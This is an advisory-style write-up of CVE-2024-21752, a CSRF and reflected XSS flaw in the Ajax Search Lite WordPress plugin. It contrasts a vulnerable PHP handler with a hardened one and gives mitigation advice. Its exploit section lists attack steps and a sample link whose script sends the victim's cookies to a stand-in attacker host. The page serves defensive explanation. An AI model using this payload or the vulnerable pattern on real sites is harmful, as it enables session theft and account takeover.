CVE-2024-21752: Cross-Site Request Forgery (CSRF) Vulnerability in Ernest Marcinko Ajax Search Lite 4.11.4 Results in Reflected XSS Exploit
---
CVE-2024-21752 is a vulnerability in the Ajax Search Lite WordPress plugin developed by Ernest Marcinko. A request handler in the plugin does not verify a nonce, so an attacker can forge the request on behalf of a logged-in user (Cross-Site Request Forgery, CSRF); because the same handler reflects request input into the page without escaping, the forged request can carry a script that runs in the victim's browser (Reflected Cross-Site Scripting, XSS). The issue affects Ajax Search Lite versions up to and including 4.11.4.
Overview of the Vulnerability
---
Cross-Site Request Forgery (CSRF) is a class of vulnerability in which an attacker causes a victim's browser to send a request the victim did not intend to a web application where the victim is currently authenticated; the browser attaches the victim's session cookies automatically, so the application treats the request as legitimate. In this case the forged request targets a plugin endpoint that lacks a nonce check, and the endpoint reflects a request parameter into its HTML response without escaping. That makes the bug a Reflected XSS: the malicious script is carried in the HTTP request itself and is "reflected" back by the server into the page. A script executing this way runs in the victim's browser under the origin of the WordPress site, so it can read what the page can read, issue further requests with the victim's privileges (for example against the site's own admin pages or REST API), and thereby act on the victim's behalf.
Code Snippet
---
The following simplified snippet illustrates the vulnerable pattern in Ernest Marcinko's Ajax Search Lite (an illustration of the pattern, not a verbatim copy of the plugin's source):
// Request handler: no nonce check, so any site can make the victim's browser send this request (CSRF)
$action = isset($_GET['asl_action']) ? $_GET['asl_action'] : null;
if (isset($_GET['wp']) && $action) {
    // Perform the vulnerable action: the raw parameter lands in the HTML response unchanged (reflected XSS)
    echo 'Reflected XSS Payload: ' . $action;
}
In the snippet above, user input is read from the asl_action parameter and written straight into the response body without output escaping, so a crafted value containing HTML or script executes in the browser of whoever loads the page. Because the handler also never verifies a WordPress nonce, the attacker does not need the victim to type anything: a link or page on an attacker-controlled site is enough to make the victim's browser send the request, which is the CSRF half of the bug.
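As an added example (this is not the plugin's own code, and the fix is not necessarily the one the plugin's author shipped), the same handler is shown beside a hardened version that closes both halves of the bug with standard WordPress APIs: the request is only honoured when it carries a valid nonce bound to the current user, the input is restricted to a known set of values, and whatever is echoed back is escaped for its HTML context. The parameter name asl_action comes from the snippet above; the function names, the nonce action name asl_demo_action and the capability check are assumptions for illustration.

```php
<?php
/**
 * Added example, not Ajax Search Lite's own code.
 *
 * asl_action is the parameter name from the snippet above; everything else
 * (function names, the nonce action 'asl_demo_action', the capability) is
 * assumed for illustration. Requires WordPress to be loaded.
 */

// Vulnerable pattern: trusts the request and echoes the input unescaped.
function asl_demo_handler_vulnerable() {
    $action = isset( $_GET['asl_action'] ) ? $_GET['asl_action'] : null;
    if ( isset( $_GET['wp'] ) && $action ) {
        echo 'Reflected XSS Payload: ' . $action; // attacker-controlled HTML
    }
}

// Hardened pattern.
function asl_demo_handler_hardened() {
    // 1. Authorisation: only a user who may administer the site gets this far.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. CSRF: require a nonce tied to this action and to the current user.
    //    check_admin_referer() verifies $_GET['_wpnonce'] with
    //    wp_verify_nonce() and stops with a 403 if it is missing or stale.
    //    A link generated by wp_nonce_url() carries a valid nonce; a link an
    //    attacker crafts on another site cannot, because the nonce depends on
    //    the victim's session and on a secret the attacker does not hold.
    check_admin_referer( 'asl_demo_action', '_wpnonce' );

    // 3. Input: unslash, normalise to a key-safe string, and accept only a
    //    whitelist of actions instead of arbitrary text.
    $action  = isset( $_GET['asl_action'] ) ? sanitize_key( wp_unslash( $_GET['asl_action'] ) ) : '';
    $allowed = array( 'reindex', 'clear_cache' );
    if ( ! in_array( $action, $allowed, true ) ) {
        wp_die( 'Unknown action', 'Bad Request', array( 'response' => 400 ) );
    }

    // 4. Output: escape for the HTML context even though the value is already
    //    whitelisted, so a later change to the whitelist cannot reintroduce XSS.
    echo 'Action requested: ' . esc_html( $action );
}

// How a legitimate caller builds a link that passes the nonce check above
// (wp_nonce_url() appends _wpnonce for the action 'asl_demo_action'):
function asl_demo_action_url( $action ) {
    $base = admin_url( 'admin.php?page=asl_demo&asl_action=' . rawurlencode( $action ) );
    return wp_nonce_url( $base, 'asl_demo_action' );
}
```

The nonce check alone would already defeat the attack path described on this page, since an attacker cannot forge a request that passes it; the escaping and whitelisting are kept because a reflected sink that is reachable by a privileged user is still a bug, and nonce checks have a habit of being removed when a handler is later exposed to the public (for example through admin-ajax.php or a REST route).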
Exploit Details
---
The following steps describe how this CSRF vulnerability is exploited against Ajax Search Lite versions up to and including 4.11.4:
1. Create a malicious website, or a message, that carries the crafted link for the Reflected XSS exploit.
2. Craft a link that points to the target web application with the XSS payload placed in the asl_action parameter.
3. Lure an authenticated user into opening the link, either through social engineering or by embedding it in a page the user trusts.
4. When the user follows the link, the browser sends the request to the target site together with the user's session cookies. The vulnerable handler accepts it without a nonce check (the CSRF), reflects the parameter into its response unescaped, and the injected script executes in the user's browser under the target site's origin (the Reflected XSS).
Here is a sample link containing a crafted payload, shown unencoded for readability (in practice the payload is URL-encoded before it is sent):
http://target-website.com/search-page?asl_action=<script>document.location='https://attacker-website.com/capture-session.php?cookie='+document.cookie;</script>;
Two caveats when reproducing this: WordPress sets its authentication cookies with the HttpOnly flag, so document.cookie will not expose them, and a realistic payload instead performs actions as the victim from inside the page rather than exfiltrating cookies; and a Content-Security-Policy on the target site that forbids inline script will block this particular payload from running even though the reflection itself remains.
Original References
---
The following links provide further details and information related to the CVE-2024-21752 vulnerability:
- CVE Entry for CVE-2024-21752
- Ajax Search Lite Plugin Page
- OWASP: CSRF Prevention
- OWASP: XSS Prevention
Conclusion and Recommendations
---
CVE-2024-21752 can lead to a compromise of the accounts and data of users who are logged in to an affected site. Developers and web administrators should mitigate it promptly in their Ajax Search Lite installations. Recommended actions:
- Update Ajax Search Lite to a release newer than 4.11.4, which is the last affected version listed for this CVE.
- Until the update is applied, limit who can reach the plugin's administrative handlers and consider deploying a Content-Security-Policy that disallows inline script, which blocks the reflected payload from executing.
- For plugin developers: verify a WordPress nonce (wp_verify_nonce or check_admin_referer) on every request handler that performs an action or reflects input, check the caller's capability, and escape every value written into a response with the escaping function for its context (esc_html, esc_attr, esc_url).
- More generally, follow secure coding practices and the OWASP CSRF and XSS prevention guidance referenced above.
By understanding this vulnerability and taking these actions, developers and web administrators can protect their web applications and their users' data from attackers.
Timeline
Published on: 02/29/2024 06:15:47 UTC
Last modified on: 02/29/2024 13:49:29 UTC